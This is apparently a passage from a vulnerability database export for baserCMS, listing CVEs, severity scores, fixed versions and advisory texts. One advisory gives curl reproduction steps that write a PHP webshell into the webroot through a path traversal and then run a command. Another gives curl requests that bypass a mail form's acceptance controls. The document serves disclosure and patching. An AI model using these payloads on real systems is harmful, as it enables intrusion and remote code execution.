vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0571, GHSA-3mcp-6rv6-c69g
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6trr-5deb-yydm
6
url VCID-7x3n-4c2b-nfbx
vulnerability_id VCID-7x3n-4c2b-nfbx
summary 
baserCMS has OS command injection vulnerability in installer
baserCMS has an OS command injection vulnerability in the installer.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

If baserCMS is placed on a server but not installed, malicious commands may be executed.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_54513170

### Credits

REN XINGDIAN
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
reference_id
reference_type
scores
0
value 0.00055
scoring_system epss
scoring_elements 0.17526
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
6
reference_url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
reference_id GHSA-6hpg-8rx3-cwgv
reference_type
scores
url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30880, GHSA-6hpg-8rx3-cwgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx
7
url VCID-891u-x525-ykbb
vulnerability_id VCID-891u-x525-ykbb
summary 
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
There is a Potential Zip Slip Vulnerability and OS Command Injection Vulnerability on the management system of baserCMS. Users with permissions to upload files may upload crafted zip files which may execute arbitrary commands on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-41243
reference_id
reference_type
scores
0
value 0.02799
scoring_system epss
scoring_elements 0.86405
published_at 2026-06-05T12:55:00Z
1
value 0.02799
scoring_system epss
scoring_elements 0.86382
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-41243
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-41243
reference_id CVE-2021-41243
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-41243
4
reference_url https://github.com/advisories/GHSA-7rpc-9m88-cf9w
reference_id GHSA-7rpc-9m88-cf9w
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7rpc-9m88-cf9w
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w
reference_id GHSA-7rpc-9m88-cf9w
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.4
purl pkg:composer/baserproject/basercms@4.5.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-ays7-6wvh-augt
6
vulnerability VCID-d1sf-cmct-zbh1
7
vulnerability VCID-g56w-z9cx-5ygv
8
vulnerability VCID-ggv8-3v9t-mfea
9
vulnerability VCID-j37y-gws9-ake9
10
vulnerability VCID-jby7-s5ez-dqb3
11
vulnerability VCID-k575-suuf-7bhf
12
vulnerability VCID-k5qv-4yp3-zbgf
13
vulnerability VCID-khft-xvrw-g3dr
14
vulnerability VCID-kmpp-6j49-pqfz
15
vulnerability VCID-mfm9-gsh3-ubg8
16
vulnerability VCID-nxrf-64er-xbfx
17
vulnerability VCID-p695-t9ye-v3ga
18
vulnerability VCID-pd8c-9d7z-zkhg
19
vulnerability VCID-sqr4-v889-tff8
20
vulnerability VCID-u16w-rbuk-ybfs
21
vulnerability VCID-uedz-j2vn-cbea
22
vulnerability VCID-y2sz-c6vb-pkdp
23
vulnerability VCID-zqd4-rdem-jfgk
24
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4
aliases CVE-2021-41243, GHSA-7rpc-9m88-cf9w
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-891u-x525-ykbb
8
url VCID-8buz-nsr9-3yge
vulnerability_id VCID-8buz-nsr9-3yge
summary 
baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API
## Summary

A path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.

An authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).

## Affected Code

**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`

```php
public function getFullpath(string $theme, string $plugin, string $type, string $path)
{
    // ...
    return $viewPath . $type . DS . $path;  // $path is not sanitized
}
```

## Attack Scenario

1. The attacker compromises an administrator account (password leak, brute force, etc.)
2. Obtains an access token via API login
3. Specifies `path: "../../../../webroot/"` in the theme file creation API
4. A PHP file is created in the webroot
5. The attacker accesses the created PHP file to achieve RCE

## Reproduction Steps

```bash
# 1. Login
curl -X POST "http://target/baser/api/admin/baser-core/users/login.json" \
  -H "Content-Type: application/json" \
  -d '{"email":"admin@example.com","password":"password"}'

# 2. Create webshell
curl -X POST "http://target/baser/api/admin/bc-theme-file/theme_files/add.json" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{
    "theme": "BcThemeSample",
    "plugin": "",
    "type": "layout",
    "path": "../../../../webroot/",
    "base_name": "shell",
    "ext": "php",
    "contents": "<?php system($_GET[\"cmd\"]); ?>"
  }'

# 3. RCE
curl "http://target/shell.php?cmd=id"
```

## Vulnerability Details

| Item | Details |
|------|---------|
| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |
| Impact | Arbitrary file write, Remote Code Execution (RCE) |
| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |
| Reproducibility | High (PoC verified) |
| Test Environment | baserCMS 5.x (Docker environment) |

### Additional Notes on Attack Prerequisites

- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.
- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.

## Recommended Fix

Rather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.

The specific implementation location and method are left to the project's design decisions.

## Comparison with Other CMS

WordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. [CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.

This vulnerability is not a matter of "administrators being able to execute arbitrary code" by design, but rather stems from a security boundary violation where "the theme editing function can write outside the theme directory (to webroot, config, etc.)."

## Resources

- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>
- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>
- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
reference_id
reference_type
scores
0
value 0.00145
scoring_system epss
scoring_elements 0.34571
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
6
reference_url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
reference_id GHSA-c5c6-37vq-pjcq
reference_type
scores
url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30940, GHSA-c5c6-37vq-pjcq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge
9
url VCID-8ssu-umet-37bk
vulnerability_id VCID-8ssu-umet-37bk
summary 
baserCMS is Vulnerable to Cross-site Scripting
baserCMS has DOM-based cross-site scripting in tag creation.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability
 Malicious JavaScript may be executed when creating a tag.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_94952030

### Credits

- quanlna2 (Le Nguyen Anh Quan)
- namdi (Do Ich Nam)
- minhnn42 (Nguyen Ngoc Minh)
- VCSLab - Viettel Cyber Security
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
6
reference_url https://github.com/advisories/GHSA-677c-xv24-crgx
reference_id GHSA-677c-xv24-crgx
reference_type
scores
url https://github.com/advisories/GHSA-677c-xv24-crgx
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-32734, GHSA-677c-xv24-crgx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk
10
url VCID-9mf7-56fh-fyfk
vulnerability_id VCID-9mf7-56fh-fyfk
summary 
Cross-site Scripting
An issue was discovered in baserCMS In the Register New Category feature of the Upload menu, the category name can be used for XSS via the `data[UploaderCategory][name]` parameter to an `admin/uploader/uploader_categories/edit` URI.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-18943
reference_id
reference_type
scores
0
value 0.00305
scoring_system epss
scoring_elements 0.54037
published_at 2026-06-04T12:55:00Z
1
value 0.00305
scoring_system epss
scoring_elements 0.54093
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-18943
1
reference_url https://basercms.net/release/4_1_4
reference_id
reference_type
scores
url https://basercms.net/release/4_1_4
2
reference_url https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4
3
reference_url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-18943
reference_id CVE-2018-18943
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-18943
fixed_packages
0
url pkg:composer/baserproject/basercms@4.1.4
purl pkg:composer/baserproject/basercms@4.1.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-ays7-6wvh-augt
9
vulnerability VCID-d1sf-cmct-zbh1
10
vulnerability VCID-d5gk-q2hh-kba5
11
vulnerability VCID-eq7f-n3g5-s3hu
12
vulnerability VCID-g56w-z9cx-5ygv
13
vulnerability VCID-ggv8-3v9t-mfea
14
vulnerability VCID-hpk4-a6tr-3ffe
15
vulnerability VCID-j37y-gws9-ake9
16
vulnerability VCID-jby7-s5ez-dqb3
17
vulnerability VCID-k575-suuf-7bhf
18
vulnerability VCID-k5qv-4yp3-zbgf
19
vulnerability VCID-khft-xvrw-g3dr
20
vulnerability VCID-kmpp-6j49-pqfz
21
vulnerability VCID-mfm9-gsh3-ubg8
22
vulnerability VCID-nxrf-64er-xbfx
23
vulnerability VCID-p695-t9ye-v3ga
24
vulnerability VCID-p6nr-eu91-53b4
25
vulnerability VCID-pd8c-9d7z-zkhg
26
vulnerability VCID-sqr4-v889-tff8
27
vulnerability VCID-twf5-bzba-gqb4
28
vulnerability VCID-u16w-rbuk-ybfs
29
vulnerability VCID-uedz-j2vn-cbea
30
vulnerability VCID-vqx2-hzju-r7et
31
vulnerability VCID-wvnk-63hy-ykeq
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-xxud-7jsh-bbc1
34
vulnerability VCID-y2sz-c6vb-pkdp
35
vulnerability VCID-zqd4-rdem-jfgk
36
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.4
aliases CVE-2018-18943, GHSA-fx2m-5m9v-jhgp
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9mf7-56fh-fyfk
11
url VCID-ays7-6wvh-augt
vulnerability_id VCID-ays7-6wvh-augt
summary 
baserCMS vulnerable to stored Cross-site Scripting
Stored cross-site scripting vulnerability in User group management of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-42486
reference_id
reference_type
scores
0
value 0.00144
scoring_system epss
scoring_elements 0.3445
published_at 2026-06-04T12:55:00Z
1
value 0.00144
scoring_system epss
scoring_elements 0.34547
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-42486
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://jvn.jp/en/jp/JVN53682526/index.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/
url https://jvn.jp/en/jp/JVN53682526/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-42486
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-42486
5
reference_url https://github.com/advisories/GHSA-7w2v-35j3-xrm9
reference_id GHSA-7w2v-35j3-xrm9
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7w2v-35j3-xrm9
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-42486, GHSA-7w2v-35j3-xrm9
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ays7-6wvh-augt
12
url VCID-d1sf-cmct-zbh1
vulnerability_id VCID-d1sf-cmct-zbh1
summary 
baserCMS has Mail Form Acceptance Bypass via Public API
### Summary
A public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.

### Details
In baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).

These checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()`  
(e.g. `plugins/bc-mail/src/Controller/MailController.php`).

However, the public API endpoint:

`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`

does not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.

The endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.

### PoC
1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).
2. Obtain a CSRF cookie by accessing the site root:
```
curl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'
```
3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:
```
curl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' 
-H 'Content-Type: application/x-www-form-urlencoded' 
-H 'Referer: http://localhost/' 
-H 'X-CSRF-Token: <csrf-token-from-cookie>' 
-b /tmp/basercms_cookies.txt 
--data-urlencode 'name_1=Test' 
--data-urlencode 'name_2=User' 
--data-urlencode 'email_1=test@example.com' 
--data-urlencode 'email_2=test@example.com' 
--data-urlencode 'category[]=資料請求' 
--data-urlencode 'root=検索エンジン' 
--data-urlencode 'message=API bypass test'
```
4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.

### Impact
This is an access control / business logic bypass vulnerability.

Administrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
reference_id
reference_type
scores
0
value 0.0002
scoring_system epss
scoring_elements 0.05615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
